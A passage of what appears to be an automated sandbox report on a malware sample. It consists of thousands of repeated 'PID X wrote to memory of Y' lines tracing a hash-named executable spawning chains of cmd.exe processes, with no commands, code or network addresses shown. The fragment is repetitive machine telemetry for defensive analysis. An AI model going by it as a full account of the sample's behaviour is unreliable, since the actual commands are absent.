c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 977 PID 1436 wrote to memory of 1940 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 977 PID 1436 wrote to memory of 1940 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 977 PID 1436 wrote to memory of 1940 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 977 PID 1940 wrote to memory of 316 1940 cmd.exe 979 PID 1940 wrote to memory of 316 1940 cmd.exe 979 PID 1940 wrote to memory of 316 1940 cmd.exe 979 PID 1940 wrote to memory of 316 1940 cmd.exe 979 PID 1940 wrote to memory of 1972 1940 cmd.exe 980 PID 1940 wrote to memory of 1972 1940 cmd.exe 980 PID 1940 wrote to memory of 1972 1940 cmd.exe 980 PID 1940 wrote to memory of 1972 1940 cmd.exe 980 PID 1940 wrote to memory of 1220 1940 cmd.exe 981 PID 1940 wrote to memory of 1220 1940 cmd.exe 981 PID 1940 wrote to memory of 1220 1940 cmd.exe 981 PID 1940 wrote to memory of 1220 1940 cmd.exe 981 PID 1220 wrote to memory of 1548 1220 cmd.exe 982 PID 1220 wrote to memory of 1548 1220 cmd.exe 982 PID 1220 wrote to memory of 1548 1220 cmd.exe 982 PID 1220 wrote to memory of 1548 1220 cmd.exe 982 PID 1940 wrote to memory of 652 1940 cmd.exe 983 PID 1940 wrote to memory of 652 1940 cmd.exe 983 PID 1940 wrote to memory of 652 1940 cmd.exe 983 PID 1940 wrote to memory of 652 1940 cmd.exe 983 PID 1436 wrote to memory of 520 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 984 PID 1436 wrote to memory of 520 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 984 PID 1436 wrote to memory of 520 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 984 PID 1436 wrote to memory of 520 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 984 PID 520 wrote to memory of 788 520 cmd.exe 986 PID 520 wrote to memory of 788 520 cmd.exe 986 PID 520 wrote to memory of 788 520 cmd.exe 986 PID 520 wrote to memory of 788 520 cmd.exe 986 PID 520 wrote to memory of 1188 520 cmd.exe 987 PID 520 wrote to memory of 1188 520 cmd.exe 987 PID 520 wrote to memory of 1188 520 cmd.exe 987 PID 520 wrote to memory of 1188 520 cmd.exe 987 PID 520 wrote to memory of 212 520 cmd.exe 988 PID 520 wrote to memory of 212 520 cmd.exe 988 PID 520 wrote to memory of 212 520 cmd.exe 988 PID 520 wrote to memory of 212 520 cmd.exe 988 PID 212 wrote to memory of 228 212 cmd.exe 989 PID 212 wrote to memory of 228 212 cmd.exe 989 PID 212 wrote to memory of 228 212 cmd.exe 989 PID 212 wrote to memory of 228 212 cmd.exe 989 PID 520 wrote to memory of 1796 520 cmd.exe 990 PID 520 wrote to memory of 1796 520 cmd.exe 990 PID 520 wrote to memory of 1796 520 cmd.exe 990 PID 520 wrote to memory of 1796 520 cmd.exe 990 PID 1436 wrote to memory of 1628 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 991 PID 1436 wrote to memory of 1628 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 991 PID 1436 wrote to memory of 1628 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 991 PID 1436 wrote to memory of 1628 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 991 PID 1628 wrote to memory of 208 1628 cmd.exe 993 PID 1628 wrote to memory of 208 1628 cmd.exe 993 PID 1628 wrote to memory of 208 1628 cmd.exe 993 PID 1628 wrote to memory of 208 1628 cmd.exe 993 PID 1628 wrote to memory of 1032 1628 cmd.exe 994 PID 1628 wrote to memory of 1032 1628 cmd.exe 994 PID 1628 wrote to memory of 1032 1628 cmd.exe 994 PID 1628 wrote to memory of 1032 1628 cmd.exe 994 PID 1628 wrote to memory of 1944 1628 cmd.exe 995 PID 1628 wrote to memory of 1944 1628 cmd.exe 995 PID 1628 wrote to memory of 1944 1628 cmd.exe 995 PID 1628 wrote to memory of 1944 1628 cmd.exe 995 PID 1944 wrote to memory of 1484 1944 cmd.exe 996 PID 1944 wrote to memory of 1484 1944 cmd.exe 996 PID 1944 wrote to memory of 1484 1944 cmd.exe 996 PID 1944 wrote to memory of 1484 1944 cmd.exe 996 PID 1628 wrote to memory of 1960 1628 cmd.exe 997 PID 1628 wrote to memory of 1960 1628 cmd.exe 997 PID 1628 wrote to memory of 1960 1628 cmd.exe 997 PID 1628 wrote to memory of 1960 1628 cmd.exe 997 PID 1436 wrote to memory of 316 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 998 PID 1436 wrote to memory of 316 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 998 PID 1436 wrote to memory of 316 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 998 PID 1436 wrote to memory of 316 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 998 PID 316 wrote to memory of 932 316 cmd.exe 1000 PID 316 wrote to memory of 932 316 cmd.exe 1000 PID 316 wrote to memory of 932 316 cmd.exe 1000 PID 316 wrote to memory of 932 316 cmd.exe 1000 PID 316 wrote to memory of 1220 316 cmd.exe 1001 PID 316 wrote to memory of 1220 316 cmd.exe 1001 PID 316 wrote to memory of 1220 316 cmd.exe 1001 PID 316 wrote to memory of 1220 316 cmd.exe 1001 PID 316 wrote to memory of 1020 316 cmd.exe 1002 PID 316 wrote to memory of 1020 316 cmd.exe 1002 PID 316 wrote to memory of 1020 316 cmd.exe 1002 PID 316 wrote to memory of 1020 316 cmd.exe 1002 PID 1020 wrote to memory of 1196 1020 cmd.exe 1003 PID 1020 wrote to memory of 1196 1020 cmd.exe 1003 PID 1020 wrote to memory of 1196 1020 cmd.exe 1003 PID 1020 wrote to memory of 1196 1020 cmd.exe 1003 PID 316 wrote to memory of 1640 316 cmd.exe 1004 PID 316 wrote to memory of 1640 316 cmd.exe 1004 PID 316 wrote to memory of 1640 316 cmd.exe 1004 PID 316 wrote to memory of 1640 316 cmd.exe 1004 PID 1436 wrote to memory of 216 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1005 PID 1436 wrote to memory of 216 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1005 PID 1436 wrote to memory of 216 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1005 PID 1436 wrote to memory of 216 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1005 PID 216 wrote to memory of 1040 216 cmd.exe 1007 PID 216 wrote to memory of 1040 216 cmd.exe 1007 PID 216 wrote to memory of 1040 216 cmd.exe 1007 PID 216 wrote to memory of 1040 216 cmd.exe 1007 PID 216 wrote to memory of 212 216 cmd.exe 1008 PID 216 wrote to memory of 212 216 cmd.exe 1008 PID 216 wrote to memory of 212 216 cmd.exe 1008 PID 216 wrote to memory of 212 216 cmd.exe 1008 PID 216 wrote to memory of 912 216 cmd.exe 1009 PID 216 wrote to memory of 912 216 cmd.exe 1009 PID 216 wrote to memory of 912 216 cmd.exe 1009 PID 216 wrote to memory of 912 216 cmd.exe 1009 PID 912 wrote to memory of 2020 912 cmd.exe 1010 PID 912 wrote to memory of 2020 912 cmd.exe 1010 PID 912 wrote to memory of 2020 912 cmd.exe 1010 PID 912 wrote to memory of 2020 912 cmd.exe 1010 PID 216 wrote to memory of 1268 216 cmd.exe 1011 PID 216 wrote to memory of 1268 216 cmd.exe 1011 PID 216 wrote to memory of 1268 216 cmd.exe 1011 PID 216 wrote to memory of 1268 216 cmd.exe 1011 PID 1436 wrote to memory of 208 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1012 PID 1436 wrote to memory of 208 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1012 PID 1436 wrote to memory of 208 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1012 PID 1436 wrote to memory of 208 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1012 PID 208 wrote to memory of 1400 208 cmd.exe 1014 PID 208 wrote to memory of 1400 208 cmd.exe 1014 PID 208 wrote to memory of 1400 208 cmd.exe 1014 PID 208 wrote to memory of 1400 208 cmd.exe 1014 PID 208 wrote to memory of 1944 208 cmd.exe 1015 PID 208 wrote to memory of 1944 208 cmd.exe 1015 PID 208 wrote to memory of 1944 208 cmd.exe 1015 PID 208 wrote to memory of 1944 208 cmd.exe 1015 PID 208 wrote to memory of 1960 208 cmd.exe 1016 PID 208 wrote to memory of 1960 208 cmd.exe 1016 PID 208 wrote to memory of 1960 208 cmd.exe 1016 PID 208 wrote to memory of 1960 208 cmd.exe 1016 PID 1960 wrote to memory of 1948 1960 cmd.exe 1017 PID 1960 wrote to memory of 1948 1960 cmd.exe 1017 PID 1960 wrote to memory of 1948 1960 cmd.exe 1017 PID 1960 wrote to memory of 1948 1960 cmd.exe 1017 PID 208 wrote to memory of 1916 208 cmd.exe 1018 PID 208 wrote to memory of 1916 208 cmd.exe 1018 PID 208 wrote to memory of 1916 208 cmd.exe 1018 PID 208 wrote to memory of 1916 208 cmd.exe 1018 PID 1436 wrote to memory of 932 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1019 PID 1436 wrote to memory of 932 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1019 PID 1436 wrote to memory of 932 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1019 PID 1436 wrote to memory of 932 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1019 PID 932 wrote to memory of 1940 932 cmd.exe 1021 PID 932 wrote to memory of 1940 932 cmd.exe 1021 PID 932 wrote to memory of 1940 932 cmd.exe 1021 PID 932 wrote to memory of 1940 932 cmd.exe 1021 PID 932 wrote to memory of 268 932 cmd.exe 1022 PID 932 wrote to memory of 268 932 cmd.exe 1022 PID 932 wrote to memory of 268 932 cmd.exe 1022 PID 932 wrote to memory of 268 932 cmd.exe 1022 PID 932 wrote to memory of 1528 932 cmd.exe 1023 PID 932 wrote to memory of 1528 932 cmd.exe 1023 PID 932 wrote to memory of 1528 932 cmd.exe 1023 PID 932 wrote to memory of 1528 932 cmd.exe 1023 PID 1528 wrote to memory of 820 1528 cmd.exe 1024 PID 1528 wrote to memory of 820 1528 cmd.exe 1024 PID 1528 wrote to memory of 820 1528 cmd.exe 1024 PID 1528 wrote to memory of 820 1528 cmd.exe 1024 PID 932 wrote to memory of 1444 932 cmd.exe 1025 PID 932 wrote to memory of 1444 932 cmd.exe 1025 PID 932 wrote to memory of 1444 932 cmd.exe 1025 PID 932 wrote to memory of 1444 932 cmd.exe 1025 PID 1436 wrote to memory of 1040 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1026 PID 1436 wrote to memory of 1040 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1026 PID 1436 wrote to memory of 1040 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1026 PID 1436 wrote to memory of 1040 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1026 PID 1040 wrote to memory of 604 1040 cmd.exe 1028 PID 1040 wrote to memory of 604 1040 cmd.exe 1028 PID 1040 wrote to memory of 604 1040 cmd.exe 1028 PID 1040 wrote to memory of 604 1040 cmd.exe 1028 PID 1040 wrote to memory of 1796 1040 cmd.exe 1029 PID 1040 wrote to memory of 1796 1040 cmd.exe 1029 PID 1040 wrote to memory of 1796 1040 cmd.exe 1029 PID 1040 wrote to memory of 1796 1040 cmd.exe 1029 PID 1040 wrote to memory of 1132 1040 cmd.exe 1030 PID 1040 wrote to memory of 1132 1040 cmd.exe 1030 PID 1040 wrote to memory of 1132 1040 cmd.exe 1030 PID 1040 wrote to memory of 1132 1040 cmd.exe 1030 PID 1132 wrote to memory of 1580 1132 cmd.exe 1031 PID 1132 wrote to memory of 1580 1132 cmd.exe 1031 PID 1132 wrote to memory of 1580 1132 cmd.exe 1031 PID 1132 wrote to memory of 1580 1132 cmd.exe 1031 PID 1040 wrote to memory of 1268 1040 cmd.exe 1032 PID 1040 wrote to memory of 1268 1040 cmd.exe 1032 PID 1040 wrote to memory of 1268 1040 cmd.exe 1032 PID 1040 wrote to memory of 1268 1040 cmd.exe 1032 PID 1436 wrote to memory of 1236 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1033 PID 1436 wrote to memory of 1236 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1033 PID 1436 wrote to memory of 1236 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1033 PID 1436 wrote to memory of 1236 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1033 PID 1236 wrote to memory of 1824 1236 cmd.exe 1035 PID 1236 wrote to memory of 1824 1236 cmd.exe 1035 PID 1236 wrote to memory of 1824 1236 cmd.exe 1035 PID 1236 wrote to memory of 1824 1236 cmd.exe 1035 PID 1236 wrote to memory of 936 1236 cmd.exe 1036 PID 1236 wrote to memory of 936 1236 cmd.exe 1036 PID 1236 wrote to memory of 936 1236 cmd.exe 1036 PID 1236 wrote to memory of 936 1236 cmd.exe 1036 PID 1236 wrote to memory of 872 1236 cmd.exe 1037 PID 1236 wrote to memory of 872 1236 cmd.exe 1037 PID 1236 wrote to memory of 872 1236 cmd.exe 1037 PID 1236 wrote to memory of 872 1236 cmd.exe 1037 PID 872 wrote to memory of 1672 872 cmd.exe 1038 PID 872 wrote to memory of 1672 872 cmd.exe 1038 PID 872 wrote to memory of 1672 872 cmd.exe 1038 PID 872 wrote to memory of 1672 872 cmd.exe 1038 PID 1236 wrote to memory of 1548 1236 cmd.exe 1039 PID 1236 wrote to memory of 1548 1236 cmd.exe 1039 PID 1236 wrote to memory of 1548 1236 cmd.exe 1039 PID 1236 wrote to memory of 1548 1236 cmd.exe 1039 PID 1436 wrote to memory of 208 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1040 PID 1436 wrote to memory of 208 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1040 PID 1436 wrote to memory of 208 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1040 PID 1436 wrote to memory of 208 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1040 PID 208 wrote to memory of 1020 208 cmd.exe 1042 PID 208 wrote to memory of 1020 208 cmd.exe 1042 PID 208 wrote to memory of 1020 208 cmd.exe 1042 PID 208 wrote to memory of 1020 208 cmd.exe 1042 PID 208 wrote to memory of 1460 208 cmd.exe 1043 PID 208 wrote to memory of 1460 208 cmd.exe 1043 PID 208 wrote to memory of 1460 208 cmd.exe 1043 PID 208 wrote to memory of 1460 208 cmd.exe 1043 PID 208 wrote to memory of 1488 208 cmd.exe 1044 PID 208 wrote to memory of 1488 208 cmd.exe 1044 PID 208 wrote to memory of 1488 208 cmd.exe 1044 PID 208 wrote to memory of 1488 208 cmd.exe 1044 PID 1488 wrote to memory of 316 1488 cmd.exe 1045 PID 1488 wrote to memory of 316 1488 cmd.exe 1045 PID 1488 wrote to memory of 316 1488 cmd.exe 1045 PID 1488 wrote to memory of 316 1488 cmd.exe 1045 PID 208 wrote to memory of 228 208 cmd.exe 1046 PID 208 wrote to memory of 228 208 cmd.exe 1046 PID 208 wrote to memory of 228 208 cmd.exe 1046 PID 208 wrote to memory of 228 208 cmd.exe 1046 PID 1436 wrote to memory of 932 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1047 PID 1436 wrote to memory of 932 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1047 PID 1436 wrote to memory of 932 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1047 PID 1436 wrote to memory of 932 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1047 PID 932 wrote to memory of 2020 932 cmd.exe 1049 PID 932 wrote to memory of 2020 932 cmd.exe 1049 PID 932 wrote to memory of 2020 932 cmd.exe 1049 PID 932 wrote to memory of 2020 932 cmd.exe 1049 PID 932 wrote to memory of 912 932 cmd.exe 1050 PID 932 wrote to memory of 912 932 cmd.exe 1050 PID 932 wrote to memory of 912 932 cmd.exe 1050 PID 932 wrote to memory of 912 932 cmd.exe 1050 PID 932 wrote to memory of 336 932 cmd.exe 1051 PID 932 wrote to memory of 336 932 cmd.exe 1051 PID 932 wrote to memory of 336 932 cmd.exe 1051 PID 932 wrote to memory of 336 932 cmd.exe 1051 PID 336 wrote to memory of 1352 336 cmd.exe 1052 PID 336 wrote to memory of 1352 336 cmd.exe 1052 PID 336 wrote to memory of 1352 336 cmd.exe 1052 PID 336 wrote to memory of 1352 336 cmd.exe 1052 PID 932 wrote to memory of 324 932 cmd.exe 1053 PID 932 wrote to memory of 324 932 cmd.exe 1053 PID 932 wrote to memory of 324 932 cmd.exe 1053 PID 932 wrote to memory of 324 932 cmd.exe 1053 PID 1436 wrote to memory of 1728 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1054 PID 1436 wrote to memory of 1728 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1054 PID 1436 wrote to memory of 1728 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1054 PID 1436 wrote to memory of 1728 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1054 PID 1728 wrote to memory of 1804 1728 cmd.exe 1056 PID 1728 wrote to memory of 1804 1728 cmd.exe 1056 PID 1728 wrote to memory of 1804 1728 cmd.exe 1056 PID 1728 wrote to memory of 1804 1728 cmd.exe 1056 PID 1728 wrote to memory of 1944 1728 cmd.exe 1057 PID 1728 wrote to memory of 1944 1728 cmd.exe 1057 PID 1728 wrote to memory of 1944 1728 cmd.exe 1057 PID 1728 wrote to memory of 1944 1728 cmd.exe 1057 PID 1728 wrote to memory of 1960 1728 cmd.exe 1058 PID 1728 wrote to memory of 1960 1728 cmd.exe 1058 PID 1728 wrote to memory of 1960 1728 cmd.exe 1058 PID 1728 wrote to memory of 1960 1728 cmd.exe 1058 PID 1960 wrote to memory of 1672 1960 cmd.exe 1059 PID 1960 wrote to memory of 1672 1960 cmd.exe 1059 PID 1960 wrote to memory of 1672 1960 cmd.exe 1059 PID 1960 wrote to memory of 1672 1960 cmd.exe 1059 PID 1728 wrote to memory of 792 1728 cmd.exe 1060 PID 1728 wrote to memory of 792 1728 cmd.exe 1060 PID 1728 wrote to memory of 792 1728 cmd.exe 1060 PID 1728 wrote to memory of 792 1728 cmd.exe 1060 PID 1436 wrote to memory of 1236 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1061 PID 1436 wrote to memory of 1236 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1061 PID 1436 wrote to memory of 1236 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1061 PID 1436 wrote to memory of 1236 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1061 PID 1236 wrote to memory of 788 1236 cmd.exe 1063 PID 1236 wrote to memory of 788 1236 cmd.exe 1063 PID 1236 wrote to memory of 788 1236 cmd.exe 1063 PID 1236 wrote to memory of 788 1236 cmd.exe 1063 PID 1236 wrote to memory of 268 1236 cmd.exe 1064 PID 1236 wrote to memory of 268 1236 cmd.exe 1064 PID 1236 wrote to memory of 268 1236 cmd.exe 1064 PID 1236 wrote to memory of 268 1236 cmd.exe 1064 PID 1236 wrote to memory of 1640 1236 cmd.exe 1065 PID 1236 wrote to memory of 1640 1236 cmd.exe 1065 PID 1236 wrote to memory of 1640 1236 cmd.exe 1065 PID 1236 wrote to memory of 1640 1236 cmd.exe 1065 PID 1640 wrote to memory of 1064 1640 cmd.exe 1066 PID 1640 wrote to memory of 1064 1640 cmd.exe 1066 PID 1640 wrote to memory of 1064 1640 cmd.exe 1066 PID 1640 wrote to memory of 1064 1640 cmd.exe 1066 PID 1236 wrote to memory of 1664 1236 cmd.exe 1067 PID 1236 wrote to memory of 1664 1236 cmd.exe 1067 PID 1236 wrote to memory of 1664 1236 cmd.exe 1067 PID 1236 wrote to memory of 1664 1236 cmd.exe 1067 PID 1436 wrote to memory of 1816 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1068 PID 1436 wrote to memory of 1816 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1068 PID 1436 wrote to memory of 1816 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1068 PID 1436 wrote to memory of 1816 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1068 PID 1816 wrote to memory of 1600 1816 cmd.exe 1070 PID 1816 wrote to memory of 1600 1816 cmd.exe 1070 PID 1816 wrote to memory of 1600 1816 cmd.exe 1070 PID 1816 wrote to memory of 1600 1816 cmd.exe 1070 PID 1816 wrote to memory of 1796 1816 cmd.exe 1071 PID 1816 wrote to memory of 1796 1816 cmd.exe 1071 PID 1816 wrote to memory of 1796 1816 cmd.exe 1071 PID 1816 wrote to memory of 1796 1816 cmd.exe 1071 PID 1816 wrote to memory of 1580 1816 cmd.exe 1072 PID 1816 wrote to memory of 1580 1816 cmd.exe 1072 PID 1816 wrote to memory of 1580 1816 cmd.exe 1072 PID 1816 wrote to memory of 1580 1816 cmd.exe 1072 PID 1580 wrote to memory of 336 1580 cmd.exe 1073 PID 1580 wrote to memory of 336 1580 cmd.exe 1073 PID 1580 wrote to memory of 336 1580 cmd.exe 1073 PID 1580 wrote to memory of 336 1580 cmd.exe 1073 PID 1816 wrote to memory of 324 1816 cmd.exe 1074 PID 1816 wrote to memory of 324 1816 cmd.exe 1074 PID 1816 wrote to memory of 324 1816 cmd.exe 1074 PID 1816 wrote to memory of 324 1816 cmd.exe 1074 PID 1436 wrote to memory of 204 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1075 PID 1436 wrote to memory of 204 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1075 PID 1436 wrote to memory of 204 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1075 PID 1436 wrote to memory of 204 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1075 PID 204 wrote to memory of 1804 204 cmd.exe 1077 PID 204 wrote to memory of 1804 204 cmd.exe 1077 PID 204 wrote to memory of 1804 204 cmd.exe 1077 PID 204 wrote to memory of 1804 204 cmd.exe 1077 PID 204 wrote to memory of 1288 204 cmd.exe 1078 PID 204 wrote to memory of 1288 204 cmd.exe 1078 PID 204 wrote to memory of 1288 204 cmd.exe 1078 PID 204 wrote to memory of 1288 204 cmd.exe 1078 PID 204 wrote to memory of 1848 204 cmd.exe 1079 PID 204 wrote to memory of 1848 204 cmd.exe 1079 PID 204 wrote to memory of 1848 204 cmd.exe 1079 PID 204 wrote to memory of 1848 204 cmd.exe 1079 PID 1848 wrote to memory of 1948 1848 cmd.exe 1080 PID 1848 wrote to memory of 1948 1848 cmd.exe 1080 PID 1848 wrote to memory of 1948 1848 cmd.exe 1080 PID 1848 wrote to memory of 1948 1848 cmd.exe 1080 PID 204 wrote to memory of 1760 204 cmd.exe 1081 PID 204 wrote to memory of 1760 204 cmd.exe 1081 PID 204 wrote to memory of 1760 204 cmd.exe 1081 PID 204 wrote to memory of 1760 204 cmd.exe 1081 PID 1436 wrote to memory of 220 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1082 PID 1436 wrote to memory of 220 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1082 PID 1436 wrote to memory of 220 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1082 PID 1436 wrote to memory of 220 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1082 PID 220 wrote to memory of 788 220 cmd.exe 1084 PID 220 wrote to memory of 788 220 cmd.exe 1084 PID 220 wrote to memory of 788 220 cmd.exe 1084 PID 220 wrote to memory of 788 220 cmd.exe 1084 PID 220 wrote to memory of 820 220 cmd.exe 1085 PID 220 wrote to memory of 820 220 cmd.exe 1085 PID 220 wrote to memory of 820 220 cmd.exe 1085 PID 220 wrote to memory of 820 220 cmd.exe 1085 PID 220 wrote to memory of 1444 220 cmd.exe 1086 PID 220 wrote to memory of 1444 220 cmd.exe 1086 PID 220 wrote to memory of 1444 220 cmd.exe 1086 PID 220 wrote to memory of 1444 220 cmd.exe 1086 PID 1444 wrote to memory of 1528 1444 cmd.exe 1087 PID 1444 wrote to memory of 1528 1444 cmd.exe 1087 PID 1444 wrote to memory of 1528 1444 cmd.exe 1087 PID 1444 wrote to memory of 1528 1444 cmd.exe 1087 PID 220 wrote to memory of 1940 220 cmd.exe 1088 PID 220 wrote to memory of 1940 220 cmd.exe 1088 PID 220 wrote to memory of 1940 220 cmd.exe 1088 PID 220 wrote to memory of 1940 220 cmd.exe 1088 PID 1436 wrote to memory of 652 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1089 PID 1436 wrote to memory of 652 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1089 PID 1436 wrote to memory of 652 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1089 PID 1436 wrote to memory of 652 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1089 PID 652 wrote to memory of 1600 652 cmd.exe 1091 PID 652 wrote to memory of 1600 652 cmd.exe 1091 PID 652 wrote to memory of 1600 652 cmd.exe 1091 PID 652 wrote to memory of 1600 652 cmd.exe 1091 PID 652 wrote to memory of 1048 652 cmd.exe 1092 PID 652 wrote to memory of 1048 652 cmd.exe 1092 PID 652 wrote to memory of 1048 652 cmd.exe 1092 PID 652 wrote to memory of 1048 652 cmd.exe 1092 PID 652 wrote to memory of 1132 652 cmd.exe 1093 PID 652 wrote to memory of 1132 652 cmd.exe 1093 PID 652 wrote to memory of 1132 652 cmd.exe 1093 PID 652 wrote to memory of 1132 652 cmd.exe 1093 PID 1132 wrote to memory of 1352 1132 cmd.exe 1094 PID 1132 wrote to memory of 1352 1132 cmd.exe 1094 PID 1132 wrote to memory of 1352 1132 cmd.exe 1094 PID 1132 wrote to memory of 1352 1132 cmd.exe 1094 PID 652 wrote to memory of 324 652 cmd.exe 1095 PID 652 wrote to memory of 324 652 cmd.exe 1095 PID 652 wrote to memory of 324 652 cmd.exe 1095 PID 652 wrote to memory of 324 652 cmd.exe 1095 PID 1436 wrote to memory of 1828 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1096 PID 1436 wrote to memory of 1828 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1096 PID 1436 wrote to memory of 1828 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1096 PID 1436 wrote to memory of 1828 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 1096 PID 1828 wrote to memory of 1628 1828 cmd.exe 1098 PID 1828 wrote to memory of 1628 1828 cmd.exe 1098 PID 1828 wrote to memory of 1628 1828 cmd.exe 1098 PID 1828 wrote to memory of 1628 1828 cmd.exe 1098 PID 1828 wrote to memory of 872 1828 